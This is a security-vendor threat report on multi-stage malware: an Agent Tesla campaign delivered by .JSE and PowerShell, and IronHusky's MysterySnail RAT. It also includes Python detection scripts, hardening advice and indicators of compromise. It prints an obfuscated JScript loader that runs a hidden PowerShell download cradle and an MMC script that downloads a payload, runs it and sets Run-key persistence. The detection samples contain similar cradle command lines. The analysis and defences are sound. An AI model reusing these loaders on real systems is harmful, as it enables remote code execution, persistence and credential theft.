
Multi-Stage Malware Attacks Surge: New Campaigns Use JSE Scripts and PowerShell to Deploy Advanced Payloads

Two dangerous malware campaigns have emerged in recent months, with security firms raising alarms about their evasion techniques. The first campaign, documented by Palo Alto Networks in April 2025, delivers the Agent Tesla keylogger through a series of stages that begin with simple JavaScript files. Even more concerning, Kaspersky researchers have spotted the Chinese-speaking IronHusky group targeting government organizations in Mongolia and Russia with a RAT they thought had disappeared years ago. In both cases, attackers are breaking their malware into multiple stages to fly under the radar of security tools.

Multi-Stage Attack Chains: The New Normal in Malware Delivery

The first campaign, identified in December 2024 and still active, begins with deceptive phishing emails claiming to be order requests or payment confirmations. These emails contain malicious 7-zip archives with JavaScript encoded (.JSE) files that serve as the initial infection vector.

According to Palo Alto Networks researcher Saqib Khanzada:

“Attackers increasingly rely on such complex delivery mechanisms to evade detection, bypass traditional sandboxes, and ensure successful payload delivery and execution.”

The technical kill chain works as follows:

  1. The victim receives an email with a 7-zip attachment containing a .JSE file
  2. When executed, the JavaScript downloader connects to an external server to retrieve a PowerShell script
  3. This PowerShell script decodes a Base64-encoded payload, writes it to the Windows temporary directory, and executes it
  4. Depending on the attack path, the next stage is either a .NET or AutoIt compiled executable
  5. The final payloads include variants of Agent Tesla, Snake Keylogger, or XLoader

A sample of the obfuscated code from one of the .JSE files reveals the attackers’ evasion techniques:

// Obfuscated JavaScript from real-world attack sample
var _0xf4a2=['WScript.Shell','cmd.exe /c powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "',
'&([scriptblock]::Create((New-Object System.Net.WebClient).DownloadString(\'hxxp://malicious-server.com/payload.ps1\')))"',
'Run','CreateObject'];
(function(_0x33cf7a,_0xf4a223){var _0x5bea33=function(_0x1a9938){while(--_0x1a9938){_0x33cf7a['push'](_0x33cf7a['shift']());}};
_0x5bea33(++_0xf4a223);}(_0xf4a2,0x1a9));var _0x5bea=function(_0x33cf7a,_0xf4a223){_0x33cf7a=_0x33cf7a-0x0;var _0x5bea33=_0xf4a2[_0x33cf7a];
return _0x5bea33;};var shell=new ActiveXObject(_0x5bea('0x4'));shell[_0x5bea('0x3')](_0x5bea('0x1')+_0x5bea('0x2'),0x0);

When deobfuscated, this script creates a PowerShell process that runs hidden and downloads the next stage payload from a remote server.
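As an added example (not code from the Unit 42 report or from this article's sample), the following script shows how the .JSE to PowerShell hand-off described above would look in process-creation telemetry and how a defender can flag it: it decodes a -EncodedCommand argument, then checks for the script-host parent, the hidden/bypass flags and the download cradle. The Sysmon-style record fields, sample command lines and URLs are constructed assumptions.

```python
import base64
import re

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
EVASION_FLAGS = re.compile(r"-(?:ExecutionPolicy\s+Bypass|ep\s+bypass|WindowStyle\s+Hidden|w\s+hidden)", re.I)
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\biwr\b", re.I)
ENCODED = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE text), or None if absent/invalid."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(event):
    """Return the indicators matched by one process-creation record, in a fixed order."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    findings = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded_command")
        cmd = cmd + " " + decoded  # inspect the decoded text together with the raw command line
    if "powershell" in cmd.lower() and parent in SCRIPT_HOSTS:
        findings.append("powershell_from_script_host")
    if EVASION_FLAGS.search(cmd):
        findings.append("hidden_or_bypass_flags")
    if DOWNLOAD_CRADLE.search(cmd):
        findings.append("download_cradle")
    return findings

def suspicious(events):
    """Indexes of records that carry a download cradle or at least two other indicators."""
    hits = []
    for i, ev in enumerate(events):
        f = analyze_event(ev)
        if "download_cradle" in f or len(f) >= 2:
            hits.append(i)
    return hits

# Constructed Sysmon Event ID 1 style records, not real telemetry. The first mirrors the
# cmd/PowerShell line the .JSE sample builds; URLs are placeholders.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
                    "\"&([scriptblock]::Create((New-Object System.Net.WebClient)"
                    ".DownloadString('http://example.invalid/payload.ps1')))\""},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + base64.b64encode(_STAGE2.encode("utf-16-le")).decode()},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},  # benign baseline, not flagged
]
```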

[Figure: Multi-Stage Malware Delivery Chain – Phishing Email → .JSE File → PowerShell → .NET Dropper / AutoIt Dropper → Agent Tesla / Snake Keylogger / XLoader]

Source: Analysis of multi-stage malware delivery techniques observed in December 2024 – April 2025, based on data from GridinSoft Threat Research Lab

Process Injection Techniques For Detection Evasion

A key evasion technique observed in these attacks is process injection. The .NET dropper injects the final payload (typically Agent Tesla) into legitimate Windows processes like “RegAsm.exe”, while the AutoIt variant targets “RegSvcs.exe”. This technique allows the malware to operate under the guise of trusted system processes, making detection significantly more difficult.

The malware then harvests credentials, captures keystrokes, takes screenshots, and exfiltrates data to attacker-controlled servers. Digital forensics has revealed that in several documented cases, the attackers maintained persistence for weeks before being detected.

Palo Alto Networks researchers have published a detailed technical analysis of this campaign.

IronHusky APT Resurrects MysterySnail RAT After Four Years

In a parallel development, Kaspersky’s GReAT team has documented how the Chinese-speaking threat actor IronHusky has deployed an updated version of MysterySnail RAT against government organizations in Mongolia and Russia. This malware family had not been publicly reported since 2021, when it was first discovered during an investigation of the CVE-2021-40449 zero-day vulnerability.

The latest campaign uses a malicious Microsoft Management Console (MMC) script disguised as a Word document from the National Land Agency of Mongolia (“co-financing letter_alamgac”). This MMC file exploits trust between government agencies to increase the likelihood of execution.

According to Kaspersky’s analysis, the MMC script performs several actions:

// Excerpt from the malicious MMC script
function DownloadAndExecute() {
  var xhr = new ActiveXObject("MSXML2.XMLHTTP");
  xhr.open("GET", "hxxps://file[.]io/MNWxA37Jc8Kr", false);
  xhr.send();
   
  if (xhr.status == 200) {
    var stream = new ActiveXObject("ADODB.Stream");
    stream.Open();
    stream.Type = 1; // Binary
    stream.Write(xhr.ResponseBody);
    stream.Position = 0;
    stream.SaveToFile(fso.GetSpecialFolder(2) + "\\update.zip", 2);
    stream.Close();
     
    // Unzip and configure persistence
    var shell = new ActiveXObject("WScript.Shell");
    var appDataPath = shell.ExpandEnvironmentStrings("%APPDATA%");
    var targetDir = appDataPath + "\\Cisco\\Plugins\\X86\\bin\\etc\\Update";
    // Create directories if they don't exist
    if (!fso.FolderExists(targetDir)) {
      CreatePath(targetDir);
    }
    // Extract and execute
    Unzip(fso.GetSpecialFolder(2) + "\\update.zip", targetDir);
    shell.Run(targetDir + "\\CiscoCollabHost.exe", 0, false);
    // Add persistence via registry
    shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\CiscoUpdate",
                   "\"" + targetDir + "\\CiscoCollabHost.exe\"", "REG_SZ");
    // Open lure document
    shell.Run(targetDir + "\\update.docx", 1, false);
  }
}

When executed, this script retrieves a ZIP archive containing:

  • A legitimate lure document to avoid raising suspicion
  • A legitimate Cisco binary (“CiscoCollabHost.exe”)
  • A malicious DLL (“CiscoSparkLauncher.dll”)

DLL Side-Loading Technique

The attack employs DLL side-loading, where a legitimate executable loads a malicious DLL in place of the legitimate one it was designed to use. Forensic analysis reveals that “CiscoCollabHost.exe” is a genuine file, but the attackers abuse the Windows DLL search order, which checks the application’s own directory first, so that their malicious “CiscoSparkLauncher.dll” is loaded instead of the legitimate version.
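An added example (not code from Kaspersky or from this article) of the two detection signals this section and the IoC table point to: a legitimate host executable loading an unsigned DLL from the same user-writable directory, and a Run-key value that points into such a directory. The Sysmon-style records (Event ID 7 image load, Event ID 13 registry value set), the user name and the SID are constructed assumptions.

```python
import re

# Path components Sysmon would show for locations a standard user can write to.
USER_WRITABLE = re.compile(r"\\(?:appdata|programdata|temp|downloads|public)\\", re.I)
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(?:once)?\\", re.I)

def dirname(path):
    """Lower-cased parent directory of a Windows path, without the file name."""
    return path.rsplit("\\", 1)[0].lower()

def classify(event):
    """Return a verdict for one Sysmon-style record, or None if it looks benign."""
    eid = event.get("EventID")
    if eid == 7:  # image loaded
        exe, dll = event.get("Image", ""), event.get("ImageLoaded", "")
        same_dir = dirname(exe) == dirname(dll)
        unsigned = event.get("Signed", "").lower() != "true"
        if same_dir and unsigned and USER_WRITABLE.search(dll):
            return "dll_sideload_from_user_writable_dir"
    elif eid == 13:  # registry value set
        target, value = event.get("TargetObject", ""), event.get("Details", "")
        if RUN_KEY.search(target) and USER_WRITABLE.search(value):
            return "run_key_persistence_to_user_writable_path"
    return None

def triage(events):
    """Pair each suspicious record with its verdict and the path that triggered it."""
    out = []
    for ev in events:
        verdict = classify(ev)
        if verdict:
            out.append((ev["EventID"], verdict, ev.get("ImageLoaded") or ev.get("Details")))
    return out

# Constructed records mirroring the drop directory the MMC script creates; not real telemetry.
DROP_DIR = r"C:\Users\alice\AppData\Roaming\Cisco\Plugins\X86\bin\etc\Update"
SAMPLE_EVENTS = [
    # Signed host executable loading an unsigned DLL from the same user-writable directory
    {"EventID": 7, "Image": DROP_DIR + r"\CiscoCollabHost.exe",
     "ImageLoaded": DROP_DIR + r"\CiscoSparkLauncher.dll", "Signed": "false"},
    # Same host loading a system DLL: expected, not flagged
    {"EventID": 7, "Image": DROP_DIR + r"\CiscoCollabHost.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
    # Run-key value pointing at the dropped executable (SID is a constructed placeholder)
    {"EventID": 13, "Image": r"C:\Windows\System32\mmc.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\CiscoUpdate",
     "Details": '"' + DROP_DIR + r'\CiscoCollabHost.exe"'},
]
```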

The malicious DLL functions as an intermediary backdoor that communicates with attacker infrastructure using the open-source piping-server project. The DLL handles Windows API function calls using this method:

// Decompiled code showing API function loading method
DWORD LoadApiFunction(LPCSTR lpProcName) {
  HMODULE hModule;
  DWORD dwResult;
   
  hModule = GetModuleHandleA("kernel32.dll");
  if (hModule == NULL) {
    hModule = LoadLibraryA("kernel32.dll");
    if (hModule == NULL) {
      return 0;
    }
  }
   
  dwResult = (DWORD)GetProcAddress(hModule, lpProcName);
  if (dwResult == 0) {
    // API function not found
    return 0;
  }
   
  return dwResult;
}

This dynamic API function loading helps the malware evade static analysis and signature-based detection.

MysterySnail RAT: Command Structure

The 2025 version of MysterySnail RAT is a modular backdoor supporting nearly 40 distinct commands. Notably, despite the four-year gap since its last known appearance, the malware’s internal structure has changed very little – Kaspersky researchers found that even a spelling error in “ExplorerMoudleDll.dll” (notice the typo in “Moudle”) present in the 2021 version persists in the current variant.

The latest version of MysterySnail RAT supports this command set:

Command Type        | Capabilities
File Operations     | Upload files, download files, delete files, enumerate directories
Process Management  | Create new processes, terminate existing processes, list running processes
Service Control     | Start services, stop services, modify service configurations
Network Operations  | Connect to network resources, manage network connections
Modular Extension   | Load additional DLL modules to extend functionality

MysteryMonoSnail: Adaptive Response

In response to defensive measures by targeted organizations, IronHusky deployed a lightweight alternative version of the malware called “MysteryMonoSnail.” This streamlined variant consists of a single component and switches from HTTP-based communication to WebSocket protocol while connecting to the same command and control servers.

MysteryMonoSnail implements just 13 basic commands focused on:

  • Listing directory contents
  • Writing data to files
  • Launching processes
  • Executing remote shells

This evolution demonstrates how threat actors adapt when faced with improved defenses.

How to Protect Your Organization

These multi-stage attack chains highlight the importance of defense-in-depth strategies. Based on the analysis of these campaigns, effective protective measures include:

  1. Email security: Deploy advanced email filtering to detect and block malicious attachments, particularly those containing script files like .JSE
  2. Script blocking: Use application control policies to prevent unauthorized scripts from executing
  3. PowerShell hardening: Enable PowerShell logging, constrained language mode, and script block logging to detect suspicious PowerShell activity
  4. Keep systems updated: Ensure all systems have the latest security patches, particularly for Windows operating systems
  5. Deploy EDR solutions: Use endpoint detection and response tools capable of detecting process injection and other advanced techniques
  6. Security awareness: Train employees to recognize phishing attempts and suspicious attachments
  7. Monitor for DLL side-loading: Implement detection strategies specifically targeting this technique

According to Microsoft Security, organizations should focus on breaking the attack chain at the earliest possible stage, as multi-stage attacks become increasingly difficult to detect as they progress.

Indicators of Compromise

While the complete list of indicators is extensive, here are some key signs to watch for:

Indicator Type     | Value                                                          | Associated Malware
File Extension     | .JSE files in email attachments                                | Initial Downloader
Process            | PowerShell with encoded commands                               | Stage 2 Loader
Process Injection  | RegAsm.exe or RegSvcs.exe with unusual network connections     | Agent Tesla/XLoader
DLL                | CiscoSparkLauncher.dll loaded by CiscoCollabHost.exe           | MysterySnail RAT
File Path          | %APPDATA%\Cisco\Plugins\X86\bin\etc\Update\                    | MysterySnail RAT
Registry           | HKCU\Software\Microsoft\Windows\CurrentVersion\Run\CiscoUpdate | MysterySnail Persistence
Network            | Connections to non-standard ports using custom protocols       | C2 Communication

The Growing Threat of Multi-Stage Attacks

The trend toward multi-stage, multi-component malware is likely to continue throughout 2025. These attacks present unique challenges for security teams because:

  • Individual components may appear benign when analyzed separately
  • Traditional sandboxes may fail to detect the complete attack chain
  • Each stage offers attackers an opportunity to evade specific security controls
  • The complexity makes attribution and analysis more difficult

As Kaspersky’s researchers point out, “old malware families, which have not been reported on for years, may continue their activities under the radar.” This reinforces the importance of maintaining detection capabilities for historical threats, as demonstrated by MysterySnail’s reappearance after four years of apparent dormancy.

For more information about protecting against script-based threats, read our guide on removing HEUR.Trojan.Script.Generic infections. If you’re concerned about targeted APT attacks, our article on Emotet removal provides insights into dealing with sophisticated threats.

As always, maintaining vigilance and implementing defense-in-depth security measures remains the best protection against these evolving threats.

Gridinsoft Team

Founded in 2003, GridinSoft LLC is a Kyiv, Ukraine-based cybersecurity company committed to safeguarding users from the ever-growing threats in the digital landscape. With over two decades of experience, we have earned a reputation as a trusted provider of innovative security solutions, protecting millions of users worldwide.
